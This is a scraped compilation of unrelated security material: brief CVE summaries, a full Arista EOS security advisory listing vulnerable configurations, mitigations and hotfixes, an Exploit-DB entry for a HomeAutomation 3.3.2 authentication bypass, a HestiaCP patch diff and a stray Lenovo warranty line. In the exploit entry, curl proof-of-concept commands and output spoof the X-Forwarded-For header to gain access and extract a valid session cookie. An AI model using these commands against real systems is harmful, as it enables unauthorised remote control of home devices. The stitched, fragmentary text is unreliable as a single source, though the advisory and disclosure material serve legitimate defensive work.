Possible stack buffer overflow due to lack of check on the maximum number of post NAN discovery attributes while processing a NAN Match event in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables

CVE-2021-1967: October 2021 Security Bulletin | Qualcomm

Possible buffer over read issue due to improper length check on WPA IE string sent by peer in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wired Infrastructure and Networking

CVE-2021-1941: September 2021 Security Bulletin | Qualcomm

The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data deletion due to a missing capability check on the wpfc_clear_cache_of_allsites_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to delete caches.

CVE-2023-1930

The JobSearch WP Job Board plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the save_locsettings function in versions up to, and including, 1.8.1. This makes it possible for unauthenticated attackers to change the settings of the plugin.

CVE-2021-4352

A NULL pointer dereference flaw was found in the Linux kernel's drivers/gpu/drm/msm/msm_gem_submit.c code in the submit_lookup_cmds function, which fails because it lacks a check of the return value of kmalloc(). This issue allows a local user to crash the system.

CVE-2023-3355

A time-of-check to time-of-use issue exists in io_uring subsystem's IORING_OP_CLOSE operation in the Linux kernel's versions 5.6 - 5.11 (inclusive), which allows a local user to elevate their privileges to root. Introduced in b5dba59e0cf7e2cc4d3b3b1ac5fe81ddf21959eb, patched in 9eac1904d3364254d622bf2c771c4f85cd435fc2, backported to stable in 788d0824269bef539fe31a785b1517882eafed93.

CVE-2023-1295

An Incorrect authorisation check in SQLLab in Apache Superset versions up to and including 2.1.0. This vulnerability allows an authenticated user to query tables that they do not have proper access to within Superset. The vulnerability can be exploited by leveraging a SQL parsing vulnerability.



**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-32672

An issue has recently been discovered in Arista EOS where the incorrect use of EOS's AAA API’s by the OpenConfig and TerminAttr agents could result in unrestricted access to the device for local users with nopassword configuration.

****Date:** January 11th, 2022**

Revision

Date

Changes

1.0

January 11th, 2022

Initial release

**Security Advisory 0071**

The CVE-ID tracking this issue: CVE-2021-28500  
CVSSv3.1 Base Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

The CVE-ID tracking this issue: CVE-2021-28501  
CVSSv3.1 Base Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

The CVE-ID tracking this issue: CVE-2021-28506  
CVSSv3.1 Base Score: 9.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)

The CVE-ID tracking this issue: CVE-2021-28507  
CVSSv3.1 Base Score: 5.5 (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N)

**Description**

This advisory documents the impact of several vulnerabilities related to OpenConfig transport protocols in Arista’s EOS software. Affected software releases are listed below.

**CVE-2021-28500, CVE-2021-28501** - An issue has recently been discovered where the incorrect use of EOS's AAA API’s by the OpenConfig and TerminAttr agents could result in unrestricted access to the device for local users with nopassword configuration.

**CVE-2021-28506** - Certain gNOI APIs incorrectly skip authorization and authentication which could potentially allow a factory reset of the device.

**CVE-2021-28507** - Under certain conditions, the service ACL configured for OpenConfig gNOI and OpenConfig RESTCONF might be bypassed, which results in the denied requests being forwarded to the agent.

**Acknowledgements**

Arista would like to acknowledge and thank Miles Sutcliffe @ https://sutcliffe.it/ for responsibly reporting CVE-2021-28500  
CVE-2021-28501, CVE-2021-28506 and CVE-2021-28507 were found internally at Arista on Arista devices.

None of the vulnerabilities are known to be actively used maliciously in the field.

**Vulnerability Assessment**

**Affected Software**

CVE-2021-28500

*   4.26.1F and below releases in the 4.26.x train
*   4.25.4M and below releases in the 4.25.x train
*   4.24.6M and below releases in the 4.24.x train
*   4.23.8M and below releases in the 4.23.x train
*   4.22.11M and below in 4.22.x train
*   4.21.14M and below in 4.21.x train
*   All prior releases

CVE-2021-28501

*   TerminAttr v1.16.1 and all prior releases

CVE-2021-28506

*   4.26.2F and below releases in the 4.26.x train
*   4.25.5.1M and below releases in the 4.25.5.x train
*   4.25.4M and below in the 4.25.4.x train
*   All prior releases in 4.25.x train
*   4.24.7M and below to 4.24.2F in the 4.24.x train

CVE-2021-28507

*   4.26.2F and below releases in the 4.26.x train
*   4.25.5.1M and below releases in the 4.25.5.x train
*   4.25.4M and below in the 4.25.4.x train
*   All prior releases in 4.25.x train
*   4.24.7M and below releases in the 4.24.x train
*   4.23.9M and below releases in the 4.23.x train
*   All releases in 4.22.x train
*   All releases in 4.21.x train
*   All prior releases

**Affected Platforms**

This is a platform-independent vulnerability and affects all systems running EOS with the versions identified above.

The following product versions and platforms are not affected by this vulnerability:

*   Arista Wireless Access Points
*   CloudVision WiFi, virtual appliance or physical appliance
*   CloudVision WiFi cloud service delivery
*   CloudVision Portal, virtual appliance or physical appliance
*   CloudVision as-a-Service
*   Arista 7130 Systems running MOS
*   Arista Converged Cloud Fabric and DANZ Monitoring Fabric (Formerly Big Switch Nodes for BCF and BMF)
*   Awake Security Platform

**Required Configuration for Exploitation**

**_Configuration vulnerable to CVE-2021-28500_**

OpenConfig gNMI/gNOI is enabled, or

management api gnmi
   transport grpc default

OpenConfig RESTCONF is enabled

management api restconf
   transport https default

and no password remote login authentication is disabled

no aaa authentication policy local allow-nopassword-remote-login

and a local user exists whose authentication is with nopassword.

username admin privilege 1 role network-admin nopassword

_**Configuration vulnerable to CVE-2021-28501**_

TerminAttr gNMI is enabled

daemon TerminAttr
   exec /usr/bin/TerminAttr ...
   no shutdown

and no password remote login authentication is disabled

no aaa authentication policy local allow-nopassword-remote-login

and a local user exists whose authentication is with nopassword.

username admin privilege 1 role network-admin nopassword

_**Configuration vulnerable to CVE-2021-28506**_

OpenConfig gNMI/gNOI

management api gnmi
   transport grpc default

_**Configuration vulnerable to CVE-2021-28507**_

A service ACL is configured and

ip access-list standard oc-acl
   10 permit host 10.1.1.1
   20 permit host 172.16.1.1/24
   30 deny any

gNMI/gNOI is configured with service ACL, or

management api gnmi
   transport grpc default
      ip access-group oc-acl

RESTCONF configured with service ACL.

management api restconf
   transport https default
      ip access-group oc-acl

**Notes**

_**Mutual TLS**_

If a mutual TLS certificate is configured for gNMI or TerminAttr, the server may not be affected by authentication vulnerabilities CVE-2021-28500, CVE-2021-28501 and CVE-2021-28506. This does not apply to RESTCONF.

OpenConfig gNMI is configured with SSL profile

management api gnmi
   transport grpc default
      ssl profile mtls-grpc-profile
management security
   ssl profile mtls-grpc-profile
      certificate target.crt key target.key
      trust certificate ca.crt

TerminAttr is configured with SSL profile

daemon TerminAttr
   exec /usr/bin/TerminAttr
      -certfile /persist/secure/ssl/certs/target.crt
      -keyfile /persist/secure/ssl/keys/target.key
      -clientcafile /persist/secure/ssl/certs/ca.crt
   no shutdown

**Symptoms**

The following system logs at /var/log/messages may indicate vulnerability to CVE-2021-28500. When a gNMI Set is issued, the host should be recognized.

Nov 24 02:31:20 cd217 ConfigAgent: %SYS-5-CONFIG\_SESSION\_ENTERED: User admin entered configuration session session1068691224937 on GNMI (10.24.128.7:46054)
Nov 24 02:31:22 cd217 ConfigAgent: %SYS-5-CONFIG\_SESSION\_COMMIT\_SUCCESS: User admin committed configuration session session1068691224937 successfully on GNMI (10.24.128.7:46054)
Nov 24 02:31:22 cd217 ConfigAgent: %SYS-5-CONFIG\_SESSION\_EXITED: User admin exited configuration session session1068691224937 on GNMI (10.24.128.7:46054)

The following symptoms may indicate vulnerability to this issue:

Check if the installed software is an affected version.  
Terminattr

switch#show version detail | grep TerminAttr-core
TerminAttr-core      v1.15.3          1

**Mitigation**

The following configuration changes may be made in order to remedy the exploitation of the listed vulnerabilities.

**Disable affected agents:**

On the affected versions, all vulnerabilities can be mitigated by disabling OpenConfig gNMI/gNOI and OpenConfig RESTCONF and TerminAttr. If use of these agents is required, a hotfix employing a proxy service can be deployed.

Disable OpenConfig gNMI

management api gnmi
   transport grpc default
      shutdown

Disable OpenConfig RESTCONF

management api restconf
   transport https default
      shutdown

Disable OpenConfig TerminAttr

daemon TerminAttr
    shutdown

**CVE-2021-28500 and CVE-2021-28501**

For local users whose authentication is with nopassword, enforce a password or remove the user.

Ensure that the following configuration does not exist where a local user is configured with nopassword.

username admin nopassword

Instead, a password can be enforced for the local user.

username admin secret 0 pass123

Please refer to the EOS user security manual for further information.

**CVE-2021-28506 and CVE-2021-28507**

No mitigation options available

For the final resolution, please refer to the resolution section which lists the details of the remediated software versions.

**Resolution**

The vulnerabilities listed below, as identified by their CVE numbers, are being tracked by the following bugs:

**CVE-2021-28500** - BUG 601875  
**CVE-2021-28501** - BUG 604880  
**CVE-2021-28506** - BUG 606192  
**CVE-2021-28507** - BUG 606248

The recommended resolution is to upgrade to a remediated software version at your earliest convenience. Arista recommends customers move to the latest version of each release that contains all the fixes listed below.

CVE-2021-28500 has been fixed in the following releases:

*   4.26.2F and later releases in the 4.26.x train
*   4.25.5M and later releases in the 4.25.x train
*   4.25.4.1M and later releases in the 4.25.4.x train
*   4.24.7M and later releases in the 4.24.x train
*   4.23.9M and later releases in the 4.23.x train
*   4.22.12M and later releases in the 4.22.x train
*   4.21.15M and later releases in the 4.21.x train

CVE-2021-28501 has been fixed in the following releases:

*   TerminAttr v1.16.2 and later releases

CVE-2021-28506 has been fixed in the following releases:

*   4.26.3M and later releases in the 4.26.x train
*   4.25.6M and later releases in the 4.25.x train
*   4.25.4.1M and later releases in the 4.25.4.x train
*   4.24.8M and later releases in the 4.24.x train

CVE-2021-28507 has been fixed in the following releases:

*   4.26.3M and later releases in the 4.26.x train
*   4.25.6M and later releases in the 4.25.x train
*   4.25.4.1M and later releases in the 4.25.4.x train
*   4.24.8M and later releases in the 4.24.x train
*   4.23.10M and later releases in the 4.23.x train

For immediate remediation until EOS can be upgraded, the following hotfix is available.

**Hotfix**

To mitigate CVE-2021-28500, CVE-2021-28501, CVE-2021-28506 and CVE-2021-28507 with the continued use of the affected agents, a hotfix employing a proxy service can be deployed. The proxy is configured behind the gNMI/gNOI or RESTCONF server.

OpenConfigProxy is a universal proxy for the OpenConfig gNMI/gNOI server, OpenConfig RESTCONF server or TerminAttr gNMI server. The proxy performs:

*   IP ACL check
*   Authentication
*   Authorization (for gNMI/gNOI only, disabled by default)

Requests are forwarded to the OpenConfig gNMI/gNOI server or RESTCONF server or TerminAttr gNMI server. Responses are sent to the collector from the gNMI/gNOI server or RESTCONF server via the proxy.

Hotfix Notes:

*   The hotfix employing a proxy service is version agnostic (i.e., the proxy can be installed on any affected version).
*   The hotfix employing a proxy service does not require a restart of the OpenConfig/Octa agent. Only OpenConfig gNMI or RESTCONF configuration changes are required.
*   The hotfix employing a proxy service installation is hitless and a reload of the switch is not required for the hotfix to take effect.

TerminAttr Note: For TerminAttr, it is recommended to update to TerminAttr v1.16.3 or above as its agent can be updated independently of the EOS version.

The following hotfix is available to remedy all CVE’s listed in this Security Advisory:

**32 bit platform:**  
**Version: 1.0**  
**URL:** OpenConfigProxy.i386.swix  
**SWIX hash:** (SHA-512)  
fef14efde0ba282ab90664ffbd5ff6d37172062ea5f97fc44b457d0b0922d4c7bc5780a0d0f89dbe540fd38e3daa875b46b5f7d57edb3973212d8b2f7f1ec7d6

**64 bit platform:**  
**Version:** 1.0  
**URL:** **OpenConfigProxy.x86\_64.swix**  
**SWIX hash:** (SHA-512)  
db4488cb6328fb93bdcbcc11edfff95be92755b5acc263d0ecff70c879e52fe51471eb1783acb9dc53a9115f575dc7146b8984c26d4282806b37b0dc5ded18c2

For detailed information on installation and configuration of the OpenConfigProxy please refer to the documentation here

****For More Information****

If you require further assistance, or if you have any further questions regarding this security notice, please contact the Arista Networks Technical Assistance Center (TAC) by one of the following methods:

****Open a Service Request:****

Please visit Customer Support for up to date information on how to open a service request via email or telephone.

CVE-2021-28501: Security Advisory 0071 - Arista

HomeAutomation 3.3.2 suffers from an authentication bypass vulnerability when spoofing client IP address using the X-Forwarded-For header with the local (loopback) IP address value allowing remote control of the smart home solution.

**HomeAutomation 3.3.2 - Authentication Bypass**

**Platform:****PHP**

**Date:****2019-12-30**

 

 # Exploit: HomeAutomation 3.3.2 - Authentication Bypass
 # Date: 2019-12-30
 # Author: LiquidWorm
 # Vendor: Tom Rosenback and Daniel Malmgren
 # Product web page: http://karpero.mine.nu/ha/
 # Affected version: 3.3.2
 # Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
 # Advisory ID: ZSL-2019-5557
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
 
 
 HomeAutomation v3.3.2 Authentication Bypass Exploit
 
 
 Vendor: Tom Rosenback and Daniel Malmgren
 Product web page: http://karpero.mine.nu/ha/
 Affected version: 3.3.2
 
 Summary: HomeAutomation is an open-source web interface and scheduling solution.
 It was initially made for use with the Telldus TellStick, but is now based on a
 plugin system and except for Tellstick it also comes with support for Crestron,
 OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
 etc.) based on an advanced scheduling system, taking into account things like
 measurements from various sensors. With the houseplan view you can get a simple
 overview of the status of your devices at their location in your house.
 
 Desc: The application suffers from an authentication bypass vulnerability when
 spoofing client IP address using the X-Forwarded-For header with the local (loopback)
 IP address value allowing remote control of the smart home solution.
 
 ===============================================================================
 /modules/login/login.module.php:
 --------------------------------
 19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
 20:
 21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
 22: {
 23: // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
 24: $action = "login";
 25: }
 26:
 27: ?>
 
 ===============================================================================
 /functions.php:
 ---------------
 733: function isIpLocal() {
 734: 
 735: 	if(substr(getIpAddress(), 0, 4) == "127.") {
 736: 		return true;
 737: 	}
 738: 
 739: 	$isIpLocal = false;
 740: 
 741: 	$localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
 742: 
 743: 	$localnets = explode(";", $localip);
 744: 	foreach($localnets as $localnet) {
 745: 		list($localnet, $localmask) = explode("/", $localnet);
 746: 		if($localmask == "") {
 747: 			$localmask = 32;
 748: 		}
 749: 		if($localmask == "" || $localmask > 32 || $localmask < 0) {
 750: 			$localmask = 32;
 751: 		}
 752: 
 753: 		// $mask = $localmask;
 754: 
 755: 		$localnet = ip2long($localnet);
 756: 		$localmask = ~((1 << (32-$localmask)) - 1);
 757: 		$remoteip = ip2long(getIpAddress());
 758: 		$maskedip = $remoteip & $localmask;
 759: 		$maskednet = $localnet & $localmask;
 760: 
 761: 		// echo " localnet:";
 762: 		// printf('%1$32b', $localnet);
 763: 
 764: 		// echo " localmask: (dec: ".$mask.")";
 765: 		// printf('%1$32b', $localmask);
 766: 
 767: 		// echo " remoteip:";
 768: 		// printf('%1$32b', $remoteip);
 769: 
 770: 		// echo " maskedip:";
 771: 		// printf('%1$32b', $maskedip);
 772: 
 773: 		// echo " maskednet:";
 774: 		// printf('%1$32b', $maskednet);
 775: 
 776: 		if($maskedip == $maskednet) {
 777: 			// echo " maskedip == maskednet";
 778: 			$isIpLocal = true;
 779: 			break;
 780: 		}
 781: 	}
 782: 	// $isIpLocal = false;
 783: 	return $isIpLocal;
 784: }
 785: 
 786: function getIpAddress() {
 787: 	return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
 788: }
 ===============================================================================
 
 Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
 Apache/2.4.29 (Ubuntu)
 PHP/7.4.0RC4
 PHP/7.3.11
 PHP 7.2.24-0ubuntu0.18.04.1
 
 
 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 @zeroscience
 
 
 Advisory ID: ZSL-2019-5557
 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php
 
 
 06.11.2019
 
 --
 
 
 PoC auth bypass and arbitrary cookie setup grepping auth'd content view:
 ------------------------------------------------------------------------
 
 root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
 * Trying 192.168.2.113...
 * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
 * found 173 certificates in /etc/ssl/certs/ca-certificates.crt
 * found 696 certificates in /etc/ssl/certs
 * ALPN, offering h2
 * ALPN, offering http/1.1
 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
 * 	 server certificate verification SKIPPED
 * 	 server certificate status verification SKIPPED
 * 	 common name: n28.nux.se (does not match '192.168.2.113')
 * 	 server certificate expiration date OK
 * 	 server certificate activation date OK
 * 	 certificate public key: RSA
 * 	 certificate version: #3
 * 	 subject: CN=n28.nux.se
 * 	 start date: Mon, 21 Oct 2019 12:18:27 GMT
 * 	 expire date: Sun, 19 Jan 2020 12:18:27 GMT
 * 	 issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
 * 	 compression: NULL
 * ALPN, server accepted to use http/1.1
 > GET /index.php HTTP/1.1
 > Host: 192.168.2.113
 > User-Agent: ZSL/0.2 (SpoofDetect 1.0)
 > Accept: */*
 > Cookie: PHPSESSID=11111111110000000000666666
 > X-Forwarded-For: 127.31.33.7
 > 
 < HTTP/1.1 303 See Other
 < Date: Wed, 20 Nov 2019 01:06:16 GMT
 < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
 < X-Powered-By: PHP/7.3.11
 < Expires: Thu, 19 Nov 1981 08:52:00 GMT
 < Cache-Control: no-store, no-cache, must-revalidate
 < Pragma: no-cache
 < Strict-Transport-Security: max-age=63072000; includeSubdomains
 < X-Frame-Options: DENY
 < X-Content-Type-Options: nosniff
 < Location: ./index.php?page=houseplan
 < Content-Length: 0
 < Content-Type: text/html; charset=UTF-8
 < 
 * Connection #0 to host 192.168.2.113 left intact
 * Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
 * Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
 * Re-using existing connection! (#0) with host 192.168.2.113
 * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
 > GET /index.php?page=houseplan HTTP/1.1
 > Host: 192.168.2.113
 > User-Agent: ZSL/0.2 (SpoofDetect 1.0)
 > Accept: */*
 > Cookie: PHPSESSID=11111111110000000000666666
 > X-Forwarded-For: 127.31.33.7
 > 
 < HTTP/1.1 200 OK
 < Date: Wed, 20 Nov 2019 01:06:16 GMT
 < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
 < X-Powered-By: PHP/7.3.11
 < Expires: Thu, 19 Nov 1981 08:52:00 GMT
 < Cache-Control: no-store, no-cache, must-revalidate
 < Pragma: no-cache
 < Strict-Transport-Security: max-age=63072000; includeSubdomains
 < X-Frame-Options: DENY
 < X-Content-Type-Options: nosniff
 < Transfer-Encoding: chunked
 < Content-Type: text/html; charset=UTF-8
 < 
 { [6 bytes data]
 *							</li><li>| <a href="./index.php?page=macros">Macros</a>
 Connection #0 to host 192.168.2.113 left intact
 root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
 * Trying 192.168.2.113...
 * Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
 * found 173 certificates in /etc/ssl/certs/ca-certificates.crt
 * found 696 certificates in /etc/ssl/certs
 * ALPN, offering h2
 * ALPN, offering http/1.1
 * SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
 * 	 server certificate verification SKIPPED
 * 	 server certificate status verification SKIPPED
 * 	 common name: n28.nux.se (does not match '192.168.2.113')
 * 	 server certificate expiration date OK
 * 	 server certificate activation date OK
 * 	 certificate public key: RSA
 * 	 certificate version: #3
 * 	 subject: CN=n28.nux.se
 * 	 start date: Mon, 21 Oct 2019 12:18:27 GMT
 * 	 expire date: Sun, 19 Jan 2020 12:18:27 GMT
 * 	 issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
 * 	 compression: NULL
 * ALPN, server accepted to use http/1.1
 > GET /index.php HTTP/1.1
 > Host: 192.168.2.113
 > User-Agent: ZSL/0.2 (SpoofDetect 1.0)
 > Accept: */*
 > Cookie: PHPSESSID=11111111110000000000666666
 > 
 < HTTP/1.1 200 OK
 < Date: Wed, 20 Nov 2019 01:06:25 GMT
 < Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
 < X-Powered-By: PHP/7.3.11
 < Expires: Thu, 19 Nov 1981 08:52:00 GMT
 < Cache-Control: no-store, no-cache, must-revalidate
 < Pragma: no-cache
 < Strict-Transport-Security: max-age=63072000; includeSubdomains
 < X-Frame-Options: DENY
 < X-Content-Type-Options: nosniff
 < Transfer-Encoding: chunked
 < Content-Type: text/html; charset=UTF-8
 < 
 { [6 bytes data]
 							</li><li>| <a href="./index.php?page=macros">Macros</a>
 * Connection #0 to host 192.168.2.113 left intact
 root@kali:~/homeautomation# 
 
 
 PoC auth bypass retrieving valid Cookie:
 -----------------------------------------
 
 root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
 Your cookie: k4dic6crpr4d4u71tr13gvtmsv

CVE-2020-22001: Offensive Security’s Exploit Database Archive

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.5.9.

@@ -5,7 +5,7 @@

  

// Delete as someone else?

if (($\_SESSION\['userContext'\] === 'admin') && (!empty($\_GET\['user'\]))) {

$user\=$\_GET\['user'\];

$user\=scapeshellarg($user);

**This comment has been minimized.**

Sign in to view

Copy link

![@TriggerLab](https://avatars.githubusercontent.com/u/2960051?s=60&v=4)

****TriggerLab** Feb 22, 2022**

mistake commit :)

**This comment has been minimized.**

Sign in to view

Copy link

![@jaapmarcus](https://avatars.githubusercontent.com/u/9754650?s=60&u=3501043adb418c67fcdb80eaa134b82d91391d95&v=4)

****jaapmarcus** Feb 22, 2022**

Author Member

Resolved in staging branch

}

  

// Check token

@@ -15,10 +15,13 @@

if ((!empty($\_GET\['domain'\])) && (empty($\_GET\['account'\]))) {

$v\_username = escapeshellarg($user);

$v\_domain = escapeshellarg($\_GET\['domain'\]);

exec(HESTIA\_CMD."v-delete-mail-domain ".$v\_username." ".$v\_domain, $output, $return\_var);

exec(HESTIA\_CMD."v-delete-mail-domain ".$user." ".$v\_domain, $output, $return\_var);

check\_return\_code($return\_var, $output);

unset($output);

$back = $\_SESSION\['back'\];

if($return\_var > 0){

header("Location: /list/mail/");

}

if (!empty($back)) {

header("Location: ".$back);

exit;

@@ -29,19 +32,22 @@

  

// Mail account

if ((!empty($\_GET\['domain'\])) && (!empty($\_GET\['account'\]))) {

$v\_username = escapeshellarg($user);

$v\_domain = escapeshellarg($\_GET\['domain'\]);

$v\_account = escapeshellarg($\_GET\['account'\]);

exec(HESTIA\_CMD."v-delete-mail-account ".$v\_username." ".$v\_domain." ".$v\_account, $output, $return\_var);

exec(HESTIA\_CMD."v-delete-mail-account ".$user." ".$v\_domain." ".$v\_account, $output, $return\_var);

check\_return\_code($return\_var, $output);

unset($output);

if($return\_var > 0){

header("Location: /list/mail/");

}else{

$back = $\_SESSION\['back'\];

if (!empty($back)) {

header("Location: ".$back);

exit;

}

header("Location: /list/mail/?domain=".$\_GET\['domain'\]);

exit;

}

}

  

$back = $\_SESSION\['back'\];

Search

lenovo warranty check/lookup | check warranty status | lenovo support us